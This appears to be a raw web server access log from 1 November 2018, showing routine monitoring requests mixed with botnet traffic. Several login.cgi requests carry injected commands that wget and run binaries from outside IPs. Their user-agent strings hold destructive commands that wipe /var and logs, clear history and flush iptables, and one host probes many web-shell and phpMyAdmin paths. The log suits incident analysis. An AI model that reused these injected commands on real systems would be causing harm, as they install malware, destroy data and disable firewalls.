68.183.114.174 - - [01/Nov/2018:08:17:16 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.33.248.206 - - [01/Nov/2018:08:19:43 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:19:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.235.154.32 - - [01/Nov/2018:08:20:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.200.138 - - [01/Nov/2018:08:20:53 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
104.222.33.115 - - [01/Nov/2018:08:21:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"
212.91.246.72 - - [01/Nov/2018:08:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
153.196.136.4 - - [01/Nov/2018:08:22:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.111.1.3 - - [01/Nov/2018:08:22:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2018:08:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.32.184.210 - - [01/Nov/2018:08:25:51 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
202.8.222.125 - - [01/Nov/2018:08:26:44 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.203.225.93 - - [01/Nov/2018:08:26:47 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.1.164.57 - - [01/Nov/2018:08:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2018:08:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.214.72.169 - - [01/Nov/2018:08:29:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.254.241.64 - - [01/Nov/2018:08:30:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.16.154.27 - - [01/Nov/2018:08:32:24 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.27.202.154 - - [01/Nov/2018:08:34:33 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:35 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:35 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:35 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:36 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:36 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:36 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:36 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:36 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:37 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:39 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:39 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:39 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:40 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:40 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:40 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:40 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:41 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:43 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:43 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:43 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:44 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:44 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:44 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:44 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:45 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.27.202.154 - - [01/Nov/2018:08:34:46 +0100] "GET /cmx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:47 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:47 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:47 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:48 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:48 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:48 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:48 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:48 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:49 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
68.183.122.63 - - [01/Nov/2018:08:34:49 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
120.27.202.154 - - [01/Nov/2018:08:34:51 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:51 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:51 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:52 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:52 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:52 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:52 +0100] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:52 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:53 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:53 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:53 +0100] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:53 +0100] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:53 +0100] "POST /sheep.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:54 +0100] "POST /qaq.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:54 +0100] "POST /db.init.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:54 +0100] "POST /db_session.init.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:55 +0100] "POST /db__.init.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:55 +0100] "POST /wp-admins.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:55 +0100] "POST /m.php?pbid=open HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:56 +0100] "POST /db_dataml.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:56 +0100] "POST /db_desql.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:56 +0100] "POST /mx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:56 +0100] "POST /wshell.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:56 +0100] "POST /xshell.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:57 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:57 +0100] "POST /conflg.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:57 +0100] "POST /lindex.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:57 +0100] "POST /phpstudy.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:58 +0100] "POST /phpStudy.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:58 +0100] "POST /weixiao.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:58 +0100] "POST /feixiang.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:58 +0100] "POST /ak47.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:59 +0100] "POST /ak48.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:59 +0100] "POST /xiao.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:34:59 +0100] "POST /yao.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:00 +0100] "POST /defect.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:00 +0100] "POST /webslee.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:00 +0100] "POST /q.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:00 +0100] "POST /pe.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:00 +0100] "POST /hm.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:01 +0100] "POST /cainiao.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:01 +0100] "POST /zuoshou.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
